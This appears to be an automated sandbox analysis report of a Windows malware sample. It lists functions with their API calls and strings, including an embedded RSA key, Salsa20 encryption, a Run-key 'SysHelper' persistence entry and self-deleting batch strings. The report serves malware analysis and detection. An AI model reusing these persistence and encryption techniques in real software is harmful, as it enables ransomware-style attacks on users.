                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    • -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnyUOiB2xE7x0hu\/sWjMd\\nsFuLWuCJ5W6ojiVZfPkO3WsiKQE44ncZ7, xrefs: 00419EC4
                                                                                                                                                    • p2Q, xrefs: 00419EE2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset
                                                                                                                                                    • String ID: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnyUOiB2xE7x0hu\/sWjMd\\nsFuLWuCJ5W6ojiVZfPkO3WsiKQE44ncZ7$p2Q
                                                                                                                                                    • API String ID: 2102423945-533411867
                                                                                                                                                    • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                                                                                                                                    • Instruction ID: 738f0ca8778653557991c93ab9a04937910ac7dae49cf0696bf478295a84fdc8
                                                                                                                                                    • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                                                                                                                                    • Instruction Fuzzy Hash: C5F03028684750A5F7107750BC667953EC1A735B08F404048E1142A3E2D7FD338C63DD
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040C070 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 280COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    • input != nullptr && output != nullptr, xrefs: 0040C095
                                                                                                                                                    • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0040C090
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __wassert
                                                                                                                                                    • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                                                                                                                                                    • API String ID: 3993402318-1975116136
                                                                                                                                                    • Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                                                                                    • Instruction ID: 1562121ec4d7abfac7b8d7a3269f54288592c24a15d8ca99342f0f863a8d7c6a
                                                                                                                                                    • Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                                                                                    • Instruction Fuzzy Hash: 43C18C75E002599FCB54CFA9C885ADEBBF1FF48300F24856AE919E7301E334AA558B54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004124E0 Relevance: 79.0, APIs: 36, Strings: 9, Instructions: 214synchronizationCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                                                                                                                                                    • GetLastError.KERNEL32 ref: 00412509
                                                                                                                                                    • CloseHandle.KERNEL32 ref: 0041251C
                                                                                                                                                    • CloseHandle.KERNEL32 ref: 00412539
                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00412550
                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041255B
                                                                                                                                                    • CloseHandle.KERNEL32 ref: 0041256E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                                                                    • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                                                                    • API String ID: 2372642624-488272950
                                                                                                                                                    • Opcode ID: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                                                                                                                                                    • Instruction ID: b8d6f70f31989c1caf7dd59f8aefe182ce9601728b58fe5e15313657dd94e056
                                                                                                                                                    • Opcode Fuzzy Hash: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                                                                                                                                                    • Instruction Fuzzy Hash: 03714E72940218AADF50ABE1DC89FEE7BACFB44305F0445A6F609D2090DF759A88CF64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00411900 Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 95stringmemorywindowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetLastError.KERNEL32 ref: 00411915
                                                                                                                                                    • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00411932
                                                                                                                                                    • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411941
                                                                                                                                                    • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411948
                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00411956
                                                                                                                                                    • lstrcpyW.KERNEL32(00000000,?), ref: 00411962
                                                                                                                                                    • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00411974
                                                                                                                                                    • lstrcatW.KERNEL32(00000000,?), ref: 0041198B
                                                                                                                                                    • lstrcatW.KERNEL32(00000000,00500260), ref: 00411993
                                                                                                                                                    • lstrcatW.KERNEL32(00000000,?), ref: 00411999
                                                                                                                                                    • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 004119A3
                                                                                                                                                    • _memset.LIBCMT ref: 004119B8
                                                                                                                                                    • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 004119DC
                                                                                                                                                      • Part of subcall function 00412BA0: lstrlenW.KERNEL32(?), ref: 00412BC9
                                                                                                                                                    • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411A01
                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00411A04
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                                                                                                                                                    • String ID: failed with error
                                                                                                                                                    • API String ID: 4182478520-946485432
                                                                                                                                                    • Opcode ID: 172b79915ac33bd678d32bde4226a0e24b826fa270b4d7bd6214eb3b2e5526ac
                                                                                                                                                    • Instruction ID: 1677776e610180b78075291f83559cfdcc99dc463041ebd32873df59a21ecb07
                                                                                                                                                    • Opcode Fuzzy Hash: 172b79915ac33bd678d32bde4226a0e24b826fa270b4d7bd6214eb3b2e5526ac
                                                                                                                                                    • Instruction Fuzzy Hash: 0021FB31A40214B7D7516B929C85FAE3A38EF45B11F100025FB09B61D0DE741D419BED
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004822E0 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 127windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004549A0: GetModuleHandleA.KERNEL32(FFFFFFFF,?,00000001,?,00454B72), ref: 004549C7
                                                                                                                                                      • Part of subcall function 004549A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                                                                                                                                                      • Part of subcall function 004549A0: GetDesktopWindow.USER32 ref: 004549FB
                                                                                                                                                      • Part of subcall function 004549A0: GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                                                                                                                                                      • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                                                                                                                                                      • Part of subcall function 004549A0: GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                                                                                                                                                      • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                                                                                                                                                      • Part of subcall function 004549A0: _wcsstr.LIBCMT ref: 00454A8A
                                                                                                                                                    • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00482316
                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00482323
                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 00482338
                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00482341
                                                                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 0048234E
                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0048235C
                                                                                                                                                    • GetObjectA.GDI32(00000000,00000018,?), ref: 0048236E
                                                                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 004823CA
                                                                                                                                                    • GetBitmapBits.GDI32(?,?,00000000), ref: 004823D6
                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 00482436
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0048243D
                                                                                                                                                    • DeleteDC.GDI32(?), ref: 0048244A
                                                                                                                                                    • DeleteDC.GDI32(?), ref: 00482450
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                                                                    • String ID: .\crypto\rand\rand_win.c$DISPLAY
                                                                                                                                                    • API String ID: 151064509-1805842116
                                                                                                                                                    • Opcode ID: 0c9c1c2ab8505d5d0ad1ff410e0c07bd783a2317b8dbec5b469f5910e3c33601
                                                                                                                                                    • Instruction ID: 00d76d2b57e2ae43ffa0e146b327d2d4306243c0a97269805a4caa25bb15a565
                                                                                                                                                    • Opcode Fuzzy Hash: 0c9c1c2ab8505d5d0ad1ff410e0c07bd783a2317b8dbec5b469f5910e3c33601
                                                                                                                                                    • Instruction Fuzzy Hash: 0441BB71944300EBD3105BB6DC86F6FBBF8FF85B14F00052EFA54962A1E77598008B6A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004635B0 Relevance: 21.5, APIs: 7, Strings: 5, Instructions: 475COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _strncmp
                                                                                                                                                    • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                                                                                                                                                    • API String ID: 909875538-2733969777
                                                                                                                                                    • Opcode ID: 84ee3cde42700812759a9ef38857a16d989f8e96272b56e8f3a280f090e98fcd
                                                                                                                                                    • Instruction ID: 696768b63e7695c6252fa4396c8fc8293dc5daf0279c077ed15b414a568efc74
                                                                                                                                                    • Opcode Fuzzy Hash: 84ee3cde42700812759a9ef38857a16d989f8e96272b56e8f3a280f090e98fcd
                                                                                                                                                    • Instruction Fuzzy Hash: 82F1E7B16483806BE721EE25DC42F5B77D89F5470AF04082FF948D6283F678DA09879B
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00425A97 Relevance: 19.6, APIs: 13, Instructions: 84COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1503006713-0
                                                                                                                                                    • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                                                                                    • Instruction ID: 8b5b6749b4f509f283f4592c8036b9fc340ac08d61b50d13b2524a40b9fdfb6a
                                                                                                                                                    • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                                                                                    • Instruction Fuzzy Hash: 7E21B331705A21ABE7217F66B802E1F7FE4DF41728BD0442FF44459192EA39A800CA5D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00411B90 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110stringcomCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00411BB0
                                                                                                                                                    • CoCreateInstance.OLE32(004CE908,00000000,00000001,004CD568,00000000), ref: 00411BC8
                                                                                                                                                    • CoUninitialize.OLE32 ref: 00411BD0
                                                                                                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00411C12
                                                                                                                                                    • SHGetPathFromIDListW.SHELL32(?,?), ref: 00411C22
                                                                                                                                                    • lstrcatW.KERNEL32(?,00500050), ref: 00411C3A
                                                                                                                                                    • lstrcatW.KERNEL32(?), ref: 00411C44
                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00411C68
                                                                                                                                                    • lstrcatW.KERNEL32(?,\shell32.dll), ref: 00411C7A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
                                                                                                                                                    • String ID: \shell32.dll
                                                                                                                                                    • API String ID: 679253221-3783449302
                                                                                                                                                    • Opcode ID: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
                                                                                                                                                    • Instruction ID: 1ac700bd2dba931ae0f93f3cd35093afe8c3aec66b03df765643047a9f16b657
                                                                                                                                                    • Opcode Fuzzy Hash: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
                                                                                                                                                    • Instruction Fuzzy Hash: 1D415E70A40209AFDB10CBA4DC88FEA7B7CEF44705F104499F609D7160D6B4AA45CB54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004549A0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 107libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleA.KERNEL32(FFFFFFFF,?,00000001,?,00454B72), ref: 004549C7
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                                                                                                                                                    • GetDesktopWindow.USER32 ref: 004549FB
                                                                                                                                                    • GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                                                                                                                                                    • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                                                                                                                                                    • GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                                                                                                                                                    • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                                                                                                                                                    • _wcsstr.LIBCMT ref: 00454A8A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                                                                    • String ID: Service-0x$_OPENSSL_isservice
                                                                                                                                                    • API String ID: 2112994598-1672312481
                                                                                                                                                    • Opcode ID: 3807c14e2e06666c3841fd577d8dc4c169a4d8fe6725ffaf2f8e04ccca0ab35a
                                                                                                                                                    • Instruction ID: a4b3c478c226dd270820e71b951499fe23bca8177d071b610c32d3665965eb2a
                                                                                                                                                    • Opcode Fuzzy Hash: 3807c14e2e06666c3841fd577d8dc4c169a4d8fe6725ffaf2f8e04ccca0ab35a
                                                                                                                                                    • Instruction Fuzzy Hash: 04312831A401049BCB10DBBAEC46AAE7778DFC4325F10426BFC19D72E1EB349D148B58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00454AE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 75registrywindowCOMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetStdHandle.KERNEL32(000000F4,00454C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0045480E,.\crypto\cryptlib.c,00000253,pointer != NULL,00000000,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454AFA
                                                                                                                                                    • GetFileType.KERNEL32(00000000), ref: 00454B05
                                                                                                                                                    • __vfwprintf_p.LIBCMT ref: 00454B27
                                                                                                                                                      • Part of subcall function 0042BDCC: _vfprintf_helper.LIBCMT ref: 0042BDDF
                                                                                                                                                    • vswprintf.LIBCMT ref: 00454B5D
                                                                                                                                                    • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00454B7E
                                                                                                                                                    • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00454BA2
                                                                                                                                                    • DeregisterEventSource.ADVAPI32(00000000), ref: 00454BA9
                                                                                                                                                    • MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 00454BD3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                                                                                                                                                    • String ID: OPENSSL$OpenSSL: FATAL
                                                                                                                                                    • API String ID: 277090408-1348657634
                                                                                                                                                    • Opcode ID: ce6eb8d3f5f16185de033b2eb02e1ed4c4d2bc7c389f561c58e1c798f68c238c
                                                                                                                                                    • Instruction ID: 2d266f03b07cc91b1361f4b715b0612335af4cc100d4b249efeb6d9ab3704f8b
                                                                                                                                                    • Opcode Fuzzy Hash: ce6eb8d3f5f16185de033b2eb02e1ed4c4d2bc7c389f561c58e1c798f68c238c
                                                                                                                                                    • Instruction Fuzzy Hash: 74210D716443006BD770A761DC47FEF77D8EF94704F80482EF699861D1EAB89444875B
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00412360 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 61registrystringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00412389
                                                                                                                                                    • _memset.LIBCMT ref: 004123B6
                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004123DE
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004123E7
                                                                                                                                                    • GetCommandLineW.KERNEL32 ref: 004123F4
                                                                                                                                                    • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004123FF
                                                                                                                                                    • lstrcpyW.KERNEL32(?,00000000), ref: 0041240E
                                                                                                                                                    • lstrcmpW.KERNEL32(?,?), ref: 00412422
                                                                                                                                                    Strings
                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0041237F
                                                                                                                                                    • SysHelper, xrefs: 004123D6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                                                                                                                                                    • API String ID: 122392481-4165002228
                                                                                                                                                    • Opcode ID: 06da7c2837e38599fef00ce52c1f6902c681b54622b65709e13af315f42eef8d
                                                                                                                                                    • Instruction ID: c603cf62551caa9c06587f3e6ced3ee16b2371f56cdaae2afb18e0be874d4686
                                                                                                                                                    • Opcode Fuzzy Hash: 06da7c2837e38599fef00ce52c1f6902c681b54622b65709e13af315f42eef8d
                                                                                                                                                    • Instruction Fuzzy Hash: D7112C7194020DABDF50DFA0DC89FEE77BCBB04705F0445A5F509E2151DBB45A889F94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00425B6E Relevance: 16.6, APIs: 11, Instructions: 131COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock_wcscmp
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1077091919-0
                                                                                                                                                    • Opcode ID: 0727ae4cc99d48966fa21793c9fc57279ad8f68c0750dd608dbf0930cc1fe26a
                                                                                                                                                    • Instruction ID: 0fe30f67420a0b57e0336c9221d2143c2ac41a82f10de3dc78134a272e9def7d
                                                                                                                                                    • Opcode Fuzzy Hash: 0727ae4cc99d48966fa21793c9fc57279ad8f68c0750dd608dbf0930cc1fe26a
